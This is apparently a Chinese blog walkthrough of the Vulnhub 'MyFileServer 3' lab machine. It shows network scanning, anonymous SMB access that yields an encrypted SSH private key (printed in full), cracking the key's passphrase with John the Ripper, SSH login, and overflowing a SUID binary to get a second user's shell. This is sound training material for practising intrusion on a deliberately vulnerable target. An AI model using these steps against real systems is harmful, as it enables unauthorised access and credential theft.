Vulnhub之MyFileServer 3靶机详细测试过程
MyFileServer 3
识别目标主机IP地址
──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:aa:7e:0e 1 60 PCS Systemtechnik GmbH
192.168.56.104 08:00:27:14:64:a8 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.104
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-30 02:47 EDT
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00032s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 45644/tcp nlockmgr
| 100021 1,3,4 49617/udp nlockmgr
| 100021 1,3,4 53505/udp6 nlockmgr
| 100021 1,3,4 55155/tcp6 nlockmgr
| 100024 1 39158/udp6 status
| 100024 1 50305/tcp status
| 100024 1 57404/tcp6 status
| 100024 1 58589/udp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
1337/tcp open waste?
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:
|_ Why are you here ?!
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 root root 16 Feb 19 2020 pub [NSE: writeable]
20048/tcp open mountd 1-3 (RPC #100005)
45644/tcp open nlockmgr 1-4 (RPC #100021)
50305/tcp open status 1 (RPC #100024)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.92%I=7%D=3/30%Time=64253089%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,14,"Why\x20are\x20you\x20here\x20\?!\n")%r(GetRequest,14,"Wh
SF:y\x20are\x20you\x20here\x20\?!\n")%r(HTTPOptions,14,"Why\x20are\x20you\
SF:x20here\x20\?!\n")%r(RTSPRequest,14,"Why\x20are\x20you\x20here\x20\?!\n
SF:")%r(Help,14,"Why\x20are\x20you\x20here\x20\?!\n")%r(TerminalServerCook
SF:ie,14,"Why\x20are\x20you\x20here\x20\?!\n")%r(Kerberos,14,"Why\x20are\x
SF:20you\x20here\x20\?!\n")%r(LPDString,14,"Why\x20are\x20you\x20here\x20\
SF:?!\n")%r(LDAPSearchReq,14,"Why\x20are\x20you\x20here\x20\?!\n")%r(SIPOp
SF:tions,14,"Why\x20are\x20you\x20here\x20\?!\n");
MAC Address: 08:00:27:14:64:A8 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m31s, median: 0s
| smb2-time:
| date: 2023-03-30T06:48:23
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-03-30T12:18:23+05:30
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.20 seconds
获得Shell
SMB服务
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ smbclient -L 192.168.56.104
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 19 00:53:12 2020
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020
todo N 162 Tue Feb 25 09:22:29 2020
id_rsa N 1766 Thu Mar 19 00:43:16 2020
note.txt N 128 Thu Mar 19 00:53:12 2020
19976192 blocks of size 1024. 18260504 blocks available
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\
smb: \> get note.txt
getting file \note.txt of size 128 as note.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> get id_rsa
getting file \id_rsa of size 1766 as id_rsa (17.1 KiloBytes/sec) (average 7.9 KiloBytes/sec)
smb: \> get todo
getting file \todo of size 162 as todo (1.5 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> get lastlog
getting file \lastlog of size 292292 as lastlog (2283.5 KiloBytes/sec) (average 615.5 KiloBytes/sec)
smb: \> quit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ cat todo
https://drive.google.com/uc?id=1JuQ4MIO9nfCUFYjP210V31EpsGAINKKc&export=download
https://drive.google.com/uc?id=19r5TYGhcM5qZOd9OTF-NwMryRAa1RteI&export=download
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ cat note.txt
I removed find command for security purpose, But don't want to delete 'getcap'.
I don't think 'getcap & capsh' known to anyone
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0111C403C183156C592743C68EA855BD
TRNiuBMH2lIgWgYpBb4MgbhQtW84gdUTJDRQLp/qwBv/KTbycWu+R07J2lGEFJH8
8G1nZ+bjnPayjTyywY5PGySQ4k5pWvmNin16TEAII7XO6Jv+/Ev/N4sPdKe7K3bN
TpJ39S5DVuj4oTTswvUp3dYU6ynu3Qp9PBRdBJnazbK5hwkxOyqa5l1dCfRDpaWf
hPM+GhXbHOvzj+Z9wvlrTuPASsBrCnXd/MAxRmNfDMCHlPHVATEChoP89awwoti5
itxcxqIWGIqilnlm7Dcy2lynE7LlXdXyJAnUI0Plra9PTqC4QoJL3Lyesypzp9Xk
kB9Hv25vherfgjy6AKBcIqZuALtFL2mij7nYC21XxcDudKCaB+UxOQhGBLNN0E16
7bNvnKebLmhyWhDNVaelvF9cd+mxvvPzv5ljhUd3jvhhyU70AgzrpF1ZUxVh2GOs
huzbtCIwX3I+xAQYdw+sThTRG8GcXLjreEUF4gJqlPNWk9gxH/AmfTmGKdLhhoSb
/7wHeMvLwSRaVv6fyPXhPpiB5c3MHCoHFYi6sbmmtYXJBum9fF9iubIzlRu/4vZ2
irmnsEff3vkqqPchb6M0zMtw80QPJgpjhclJjDPiI5P1DWjgLNYOQba0nKNQ3RFa
iy2lup+EsCqWU0KTI+hH+Xm0YAq2/ESqPeNp/U+78y8L5JkpavRYNJyx+vGV8XPP
dGkZD8x68xLIwF6/urZC6utRa1HgyEDIcUbyTUnbRkLUFWbN9eHLrY0pH+zhKJOj
14cUAOpB9RkxAoE6YJ03vJq72OoxfCYhiv3fj4pQRuQJwA2c8IfgdwIJqBIMVPvV
5HX3j5ugkyocLl5Rg+oXjyhNczmABJehk9gA0eCcfQpXGPw/OBMJ4BJdUHxbCOtQ
lAstu+fNBosFhkj3lHXX/ZNIKcYs9+Mvs3E2DvmcK7Us/59qsCwHRZNvd2E3EF9r
nNuHg8sY5HxMvMNH46PH8c4EesuNvOW2pvaCHCT5Id3Up1yyP09hoxyyovnPQ/Gj
HXffEjkc82t9Ip476mfo0NBzB4g7sOb4ZXhG8RxHS4d83S5bITzHP8RrlmkdKCjH
U5YMap/xQ++4XTtgX8DjVoZw1imRtNsCQk6fe0UVKzg2nFV8rkOU8A1o6NDcjE/Z
V/PsYJT3CTEvlzq1/4lLQN2nLrpwmlu+Ate5CEmKxqDIpSIzQBl5N4cU5aa/L1XG
2nFA4H1Ipo7CaUQZ3lQGC/wHaWcP0KnZQ/SrInGOQVu1RJe3MhyG3TyC06FVfmgV
m4oqf39lGQlYX8+cTCK8w6nI6gnSsW92U9j5s9iGEZKN2bI1poyurQaExFiDub6m
QzYWqY1+EUBUYzFMlR08TeHXLvoAmgJNcnZlhXuhWsl6z95UMKvRBLN3Dc4kIVZx
sBZmlYhqhwl0AWYQOl1tJrOMiqLeMhF+xWZ3J/iZ9Pj37Dz9xL8YiA8YUNC/NqT+
3j1s3USXPL0uyxS7tnJJf3aXMBi0XwwHWZg4ii8JQhGiiPhGBE9lpRyPhYCx3xDC
ED/GW22/sWS5fhDr4tynP8VdjiFwbBEcXYHa84XjeUZZaLJQTSwnE/afWVYty8AX
-----END RSA PRIVATE KEY-----
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ enum4linux 192.168.56.104
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\smbuser (Local User)
S-1-22-1-1001 Unix User\bla (Local User)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ ssh -i id_rsa smbuser@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ED25519) to the list of known hosts.
##############################################################################################
# InfoSec Warrior #
# --------- www.InfoSecWarrior.com ------------ #
# My File Server - 3 #
# Just a simple addition to the problem #
# Designed By :- CyberKnight #
# Twitter :- @CyberKnight00 #
##############################################################################################
Enter passphrase for key 'id_rsa':
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (id_rsa)
1g 0:00:00:00 DONE (2023-03-30 02:56) 3.333g/s 53.33p/s 53.33c/s 53.33C/s 123456..jessica
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer3]
└─$ ssh -i id_rsa smbuser@192.168.56.104
##############################################################################################
# InfoSec Warrior #
# --------- www.InfoSecWarrior.com ------------ #
# My File Server - 3 #
# Just a simple addition to the problem #
# Designed By :- CyberKnight #
# Twitter :- @CyberKnight00 #
##############################################################################################
Enter passphrase for key 'id_rsa':
Last login: Thu Mar 19 10:15:35 2020 from 192.168.56.1
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$
竟然已经拿到了shell。
[smbuser@fileserver ~]$ /usr/bin/esclate
123456789012345678901234567
Why are you here ?!
[smbuser@fileserver ~]$ /usr/bin/esclate
123456789012345687901234567890123456
Segmentation fault
[smbuser@fileserver ~]$ /usr/bin/esclate
1234567890123456789012345678901234
sh-4.2$ id
uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)
sh-4.2$
escalate有SUID位,而且输入不同长度的信息时输出不一样,有缓冲区溢出漏洞,当输入34个数字的时候,得到了用户bla的shell
sh-4.2$ cat user.txt
_____ _ _ ____ _____
| ___(_) | ___/ ___| ___ _ ____ _____ _ __ |___ /
| |_ | | |/ _ \___ \ / _ \ '__\ \ / / _ \ '__| _____ |_ \
| _| | | | __/___) | __/ | \ V / __/ | |_____| ___) |
|_| |_|_|\___|____/ \___|_| \_/ \___|_| |____/
Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f
you can crack this hash, because it is also my pasword
note: crack it, itiseasy
得到了user flag,而且作者说这个flag也是密码,因此用John工具破解:
用在线网站破解得到密码为itiseasy
STRIVE FOR PROGRESS,NOT FOR PERFECTION
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
2022-03-30 Shutterfly数据泄露
2022-03-30 利用python编写的ARP欺骗攻击
2022-03-30 利用Python提取网站登录的用户名与密码